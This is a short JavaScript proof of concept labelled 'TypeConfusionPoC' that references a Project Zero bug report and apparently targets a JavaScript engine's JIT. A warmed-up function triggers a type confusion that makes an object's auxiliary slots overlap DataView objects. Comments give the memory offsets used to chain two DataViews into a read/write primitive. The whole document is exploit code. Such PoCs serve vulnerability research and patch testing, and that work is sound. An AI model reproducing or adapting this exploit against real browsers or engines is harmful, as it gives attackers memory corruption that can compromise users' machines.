function createAuxSlotsObj() {
    let o = {}
    o.a = 1;
    o.b = 2;
    o.c = 3;
    o.d = 4;
    o.e = 5;
    o.f = 6;
    o.g = 7;
    o.h = 8;
    o.i = 9;
    o.j = 10;

    return o;
}

const TypeConfusionPoC = {
    // ref: https://bugs.chromium.org/p/project-zero/issues/detail?id=1702
    TypeConfusion: (dataview1, dataview2) => {
        function opt(o, proto, value) {
            o.b = 1;
            let tmp = { __proto__: proto };
            o.a = value;
        }

        let auxSlotsObj = createAuxSlotsObj();

        for (let i = 0; i < 2000; i++) {
            let o = { a: 1, b: 2 };
            opt(o, {}, {});
        }

        let inlineObj = { a: 1, b: 2 };
        opt(inlineObj, inlineObj, auxSlotsObj);

        // auxSlotsObj->auxSlots (inlineObj->auxSlots+0x10) = dataview1
        inlineObj.c = dataview1;

        // dataview1->buffer (auxSlotsObj->auxSlots+0x38) = dataview2
        auxSlotsObj.h = dataview2;
    },
}